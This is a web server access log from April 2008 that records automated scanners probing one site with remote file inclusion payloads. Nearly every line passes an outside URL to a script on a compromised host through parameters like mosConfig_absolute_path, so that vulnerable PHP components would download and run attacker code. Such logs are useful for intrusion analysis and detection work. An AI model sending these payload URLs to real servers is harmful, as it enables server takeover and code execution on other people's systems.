64.207.204.13 - - [30/Apr/2008:09:27:35 -0700] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.ttb.org.tr/avian/templates/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.207.204.13 - - [30/Apr/2008:09:27:35 -0700] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.ttb.org.tr/avian/templates/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.207.204.13 - - [30/Apr/2008:09:27:35 -0700] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.ttb.org.tr/avian/templates/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.207.204.13 - - [30/Apr/2008:09:27:36 -0700] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.ttb.org.tr/avian/templates/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.246.77.203 - - [30/Apr/2008:09:27:52 -0700] "GET /logs/access.log//config/dbutil.bck.php?confdir=http://216.139.236.19/cache/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.246.77.203 - - [30/Apr/2008:09:27:52 -0700] "GET //config/dbutil.bck.php?confdir=http://216.139.236.19/cache/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.246.77.203 - - [30/Apr/2008:09:27:52 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://216.139.236.19/cache/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.40.12.40 - - [30/Apr/2008:09:27:58 -0700] "GET /logs/access_080207.log//skin/zero_vote/ask_password.php?dir=http://auktiontips.com/images/stories/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.40.12.40 - - [30/Apr/2008:09:27:58 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://auktiontips.com/images/stories/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.40.12.40 - - [30/Apr/2008:09:27:59 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://auktiontips.com/images/stories/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.47.247.136 - - [30/Apr/2008:09:28:07 -0700] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://h1.ripway.com/las/sundalak//kul/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.47.247.136 - - [30/Apr/2008:09:28:08 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://h1.ripway.com/las/sundalak//kul/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
75.126.158.150 - - [30/Apr/2008:09:28:19 -0700] "GET /logs/access.log//config/dbutil.bck.php?confdir=http://216.139.236.19/cache/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
75.126.158.150 - - [30/Apr/2008:09:28:19 -0700] "GET //config/dbutil.bck.php?confdir=http://216.139.236.19/cache/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
75.126.158.150 - - [30/Apr/2008:09:28:19 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://216.139.236.19/cache/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.172.175.130 - - [30/Apr/2008:09:28:46 -0700] "GET /logs/access_080227.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
66.132.204.166 - - [30/Apr/2008:09:29:07 -0700] "GET //atom.php5?page=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.132.204.166 - - [30/Apr/2008:09:29:07 -0700] "GET //atom.php5?page=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.123.108.73 - - [30/Apr/2008:09:29:15 -0700] "GET /logs//atom.php5?page=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.123.108.73 - - [30/Apr/2008:09:29:15 -0700] "GET //atom.php5?page=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.172.175.130 - - [30/Apr/2008:09:29:17 -0700] "GET /logs/access_071230.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
121.88.4.5 - - [30/Apr/2008:09:29:30 -0700] "GET /logs/access_080228.log//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://computasiunair.com/paddy/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
121.88.4.5 - - [30/Apr/2008:09:29:31 -0700] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://computasiunair.com/paddy/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.172.175.130 - - [30/Apr/2008:09:29:55 -0700] "GET /logs/access_080223.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
80.74.155.173 - - [30/Apr/2008:09:30:03 -0700] "GET /logs/access_080223.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://200.167.24.12/anatomia/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.74.155.173 - - [30/Apr/2008:09:30:03 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://200.167.24.12/anatomia/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.74.155.173 - - [30/Apr/2008:09:30:04 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://200.167.24.12/anatomia/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.40.12.40 - - [30/Apr/2008:09:30:06 -0700] "GET /logs/access_080106.log//skin/zero_vote/ask_password.php?dir=http://auktiontips.com/images/stories/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
121.88.4.5 - - [30/Apr/2008:09:31:38 -0700] "GET /logs/access.log//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://computasiunair.com/paddy/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
92.48.75.104 - - [30/Apr/2008:09:32:16 -0700] "GET /logs/index.php?redir=http://forestclimate.net/backup/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
92.48.75.104 - - [30/Apr/2008:09:32:19 -0700] "GET /index.php?redir=http://forestclimate.net/backup/id.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.811" "www.dmulk.com"
83.184.243.31 - - [30/Apr/2008:09:33:03 -0700] "GET //errors.php?error=http://www.cnm.gob.pe/cnm/cache/tmp0/help01.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.184.243.31 - - [30/Apr/2008:09:33:03 -0700] "GET /logs//errors.php?error=http://www.cnm.gob.pe/cnm/cache/tmp0/help01.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.184.243.31 - - [30/Apr/2008:09:33:03 -0700] "GET /logs/access_080306.log//errors.php?error=http://www.cnm.gob.pe/cnm/cache/tmp0/help01.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.184.243.31 - - [30/Apr/2008:09:33:14 -0700] "GET /logs/access_080218.log//errors.php?error=http://www.cnm.gob.pe/cnm/cache/tmp0/help01.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.246.61.4 - - [30/Apr/2008:09:33:14 -0700] "GET /logs/access.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.246.61.4 - - [30/Apr/2008:09:33:15 -0700] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.246.61.4 - - [30/Apr/2008:09:33:16 -0700] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.130.242.135 - - [30/Apr/2008:09:33:21 -0700] "GET /logs/access_080306.log/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://franklynlodge.com/safe.cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.130.242.135 - - [30/Apr/2008:09:33:21 -0700] "GET /administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://franklynlodge.com/safe.cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.130.242.135 - - [30/Apr/2008:09:33:22 -0700] "GET /logs/access_080306.log/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.geocities.com/k4l0nkicc/safe.cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.130.242.135 - - [30/Apr/2008:09:33:22 -0700] "GET /logs/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://franklynlodge.com/safe.cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.130.242.135 - - [30/Apr/2008:09:33:22 -0700] "GET /administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.geocities.com/k4l0nkicc/safe.cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.130.242.135 - - [30/Apr/2008:09:33:22 -0700] "GET /logs/access_080306.log/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.geocities.com/k4l0nkicc/safe.cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.130.242.135 - - [30/Apr/2008:09:33:23 -0700] "GET /logs/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.geocities.com/k4l0nkicc/safe.cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.130.242.135 - - [30/Apr/2008:09:33:23 -0700] "GET /administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.geocities.com/k4l0nkicc/safe.cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.130.242.135 - - [30/Apr/2008:09:33:23 -0700] "GET /logs/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.geocities.com/k4l0nkicc/safe.cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.130.242.135 - - [30/Apr/2008:09:33:28 -0700] "GET /logs/access_080129.log/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://franklynlodge.com/safe.cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.68.11.34 - - [30/Apr/2008:09:33:31 -0700] "GET /logs/access_080212.log/avatar.php?page=http://www.upfni.com//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.130.242.135 - - [30/Apr/2008:09:33:31 -0700] "GET /logs/access_080129.log/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.geocities.com/k4l0nkicc/safe.cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.130.242.135 - - [30/Apr/2008:09:33:32 -0700] "GET /logs/access_080129.log/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.geocities.com/k4l0nkicc/safe.cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.68.11.34 - - [30/Apr/2008:09:33:37 -0700] "GET /avatar.php?page=http://www.upfni.com//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.68.11.34 - - [30/Apr/2008:09:33:42 -0700] "GET /logs/avatar.php?page=http://www.upfni.com//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.141.56.138 - - [30/Apr/2008:09:33:49 -0700] "GET /logs/access_080315.log//atom.php5?page=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.141.56.138 - - [30/Apr/2008:09:33:58 -0700] "GET /logs/access_080324.log//atom.php5?page=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.104.34.62 - - [30/Apr/2008:09:34:20 -0700] "GET /logs/access_080218.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://taimma.com/dchp/idd?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.249.127.234 - - [30/Apr/2008:09:34:42 -0700] "GET /logs/access_080129.log//plugins/spamx/DeleteComment.Action.class.php?_CONF[path]=http://www.loader.fr/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.249.127.234 - - [30/Apr/2008:09:34:42 -0700] "GET //plugins/spamx/DeleteComment.Action.class.php?_CONF[path]=http://www.loader.fr/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.249.127.234 - - [30/Apr/2008:09:34:42 -0700] "GET /logs//plugins/spamx/DeleteComment.Action.class.php?_CONF[path]=http://www.loader.fr/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.207.204.13 - - [30/Apr/2008:09:34:43 -0700] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.ttb.org.tr/avian/templates/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.207.204.13 - - [30/Apr/2008:09:34:43 -0700] "GET //excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.ttb.org.tr/avian/templates/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.235.56.178 - - [30/Apr/2008:09:34:45 -0700] "GET /logs/access.log//config/dbutil.bck.php?confdir=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.235.56.178 - - [30/Apr/2008:09:34:45 -0700] "GET //config/dbutil.bck.php?confdir=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.235.56.178 - - [30/Apr/2008:09:34:45 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
195.205.214.163 - - [30/Apr/2008:09:34:57 -0700] "GET /logs/access.log/index.php?option=com_custompages&cpage=http://www.marc-bolan.com/cartnew/product_uploads/%20%20%20/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
70.91.145.249 - - [30/Apr/2008:09:35:02 -0700] "GET /logs/access_080124.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.vspbilgisayar.com/fuckrox-id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.205.214.163 - - [30/Apr/2008:09:35:07 -0700] "GET /index.php?option=com_custompages&cpage=http://www.marc-bolan.com/cartnew/product_uploads/%20%20%20/id.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.803" "www.dmulk.com"
195.205.214.163 - - [30/Apr/2008:09:35:08 -0700] "GET /logs/index.php?option=com_custompages&cpage=http://www.marc-bolan.com/cartnew/product_uploads/%20%20%20/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.55.165.133 - - [30/Apr/2008:09:35:10 -0700] "GET /logs/access_080324.log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://edgcs.com/store/administrator/components/com_jcs/views/test.cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.55.165.133 - - [30/Apr/2008:09:35:10 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://edgcs.com/store/administrator/components/com_jcs/views/test.cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.55.165.133 - - [30/Apr/2008:09:35:10 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://edgcs.com/store/administrator/components/com_jcs/views/test.cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.53.137.18 - - [30/Apr/2008:09:35:40 -0700] "GET /templates/mangobery/footer.sample.php?Site_Path=http://blackcrew.biz/dur.haka?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.132.204.166 - - [30/Apr/2008:09:36:20 -0700] "GET /logs/access_080315.log//atom.php5?page=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.132.204.166 - - [30/Apr/2008:09:36:20 -0700] "GET /logs//atom.php5?page=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.132.204.166 - - [30/Apr/2008:09:36:22 -0700] "GET /logs/access_080315.log//atom.php5?page=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.132.204.166 - - [30/Apr/2008:09:36:23 -0700] "GET /logs//atom.php5?page=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
89.108.93.123 - - [30/Apr/2008:09:36:58 -0700] "GET /logs/access.log//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://computasiunair.com/paddy/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
89.108.93.123 - - [30/Apr/2008:09:36:59 -0700] "GET //administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://computasiunair.com/paddy/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
89.108.93.123 - - [30/Apr/2008:09:37:00 -0700] "GET /logs//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://computasiunair.com/paddy/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
196.35.158.180 - - [30/Apr/2008:09:37:04 -0700] "GET /logs/access.log//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
196.35.158.181 - - [30/Apr/2008:09:37:07 -0700] "GET //xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
196.35.158.181 - - [30/Apr/2008:09:37:09 -0700] "GET /logs//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
89.106.244.146 - - [30/Apr/2008:09:37:17 -0700] "GET /logs/access.log//config/dbutil.bck.php?confdir=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.106.244.146 - - [30/Apr/2008:09:37:18 -0700] "GET //config/dbutil.bck.php?confdir=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.106.244.146 - - [30/Apr/2008:09:37:18 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.132.204.166 - - [30/Apr/2008:09:37:38 -0700] "GET /logs/access_080324.log//atom.php5?page=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.132.204.166 - - [30/Apr/2008:09:37:42 -0700] "GET /logs/access_080324.log//atom.php5?page=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
201.130.79.61 - - [30/Apr/2008:09:38:14 -0700] "GET /logs//plugins/spamx/DeleteComment.Action.class.php?_CONF[path]=http://computasiunair.com/paddy/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.205.214.163 - - [30/Apr/2008:09:38:19 -0700] "GET /logs/access.log/index.php?option=com_custompages&cpage=http://www.marc-bolan.com/cartnew/product_uploads/%20%20%20/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.205.214.163 - - [30/Apr/2008:09:38:24 -0700] "GET /index.php?option=com_custompages&cpage=http://www.marc-bolan.com/cartnew/product_uploads/%20%20%20/id.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.803" "www.dmulk.com"
195.205.214.163 - - [30/Apr/2008:09:38:25 -0700] "GET /logs/index.php?option=com_custompages&cpage=http://www.marc-bolan.com/cartnew/product_uploads/%20%20%20/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
210.113.203.55 - - [30/Apr/2008:09:39:03 -0700] "GET /logs/access_080129.log//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://computasiunair.com/paddy/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.130.242.135 - - [30/Apr/2008:09:39:34 -0700] "GET /administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.geocities.com/k4l0nkicc/safe.cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.130.242.135 - - [30/Apr/2008:09:39:34 -0700] "GET /administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.geocities.com/k4l0nkicc/safe.cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.205.6.175 - - [30/Apr/2008:09:39:39 -0700] "GET /logs/access_080223.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://200.167.24.12/anatomia/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.205.6.175 - - [30/Apr/2008:09:39:40 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://200.167.24.12/anatomia/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.205.6.175 - - [30/Apr/2008:09:39:40 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://200.167.24.12/anatomia/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.249.127.234 - - [30/Apr/2008:09:39:44 -0700] "GET /logs/access_080104.log//plugins/spamx/DeleteComment.Action.class.php?_CONF[path]=http://www.loader.fr/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.34.78.106 - - [30/Apr/2008:09:39:59 -0700] "GET /logs/access_080129.log/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://edgcs.com/store/administrator/components/com_jcs/views/test.cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.34.78.106 - - [30/Apr/2008:09:39:59 -0700] "GET /administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://edgcs.com/store/administrator/components/com_jcs/views/test.cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.74.9.26 - - [30/Apr/2008:09:39:59 -0700] "GET /logs/access_080215.log/////?mosConfig_absolute_path=http://www.knowledgeteam.altervista.org/asfasdf/543534/forum.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.34.78.106 - - [30/Apr/2008:09:40:00 -0700] "GET /logs/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://edgcs.com/store/administrator/components/com_jcs/views/test.cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.34.78.106 - - [30/Apr/2008:09:40:08 -0700] "GET /logs/access_080205.log/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://edgcs.com/store/administrator/components/com_jcs/views/test.cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.123.108.73 - - [30/Apr/2008:09:40:18 -0700] "GET /logs/access_080315.log//atom.php5?page=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.74.155.173 - - [30/Apr/2008:09:40:23 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://200.167.24.12/anatomia/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.74.155.173 - - [30/Apr/2008:09:40:24 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://200.167.24.12/anatomia/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.55.165.133 - - [30/Apr/2008:09:41:11 -0700] "GET /logs/access_080228.log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://edgcs.com/store/administrator/components/com_jcs/views/test.cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
200.89.198.133 - - [30/Apr/2008:09:41:23 -0700] "GET /logs/access_071224.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://forum.radiojohn.nl/auction/images/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.22.162.60 - - [30/Apr/2008:09:41:27 -0700] "GET /administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://fadhilla.com/program/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
69.22.162.60 - - [30/Apr/2008:09:41:27 -0700] "GET /logs/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://fadhilla.com/program/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
64.123.108.73 - - [30/Apr/2008:09:41:29 -0700] "GET /logs/access_080324.log//atom.php5?page=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.74.9.26 - - [30/Apr/2008:09:41:33 -0700] "GET /logs/access.log/////?mosConfig_absolute_path=http://www.knowledgeteam.altervista.org/asfasdf/543534/forum.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.113.203.55 - - [30/Apr/2008:09:41:43 -0700] "GET /logs/access_080228.log//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://computasiunair.com/paddy/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.113.203.55 - - [30/Apr/2008:09:41:44 -0700] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://computasiunair.com/paddy/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
86.109.167.35 - - [30/Apr/2008:09:42:00 -0700] "GET /logs/access_080215.log/////?mosConfig_absolute_path=http://www.knowledgeteam.altervista.org/asfasdf/543534/forum.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.169.130.142 - - [30/Apr/2008:09:42:09 -0700] "GET /logs/access.log/view.inc.php?phpAds_path=http://www.upfni.com//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.169.130.142 - - [30/Apr/2008:09:42:09 -0700] "GET /view.inc.php?phpAds_path=http://www.upfni.com//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
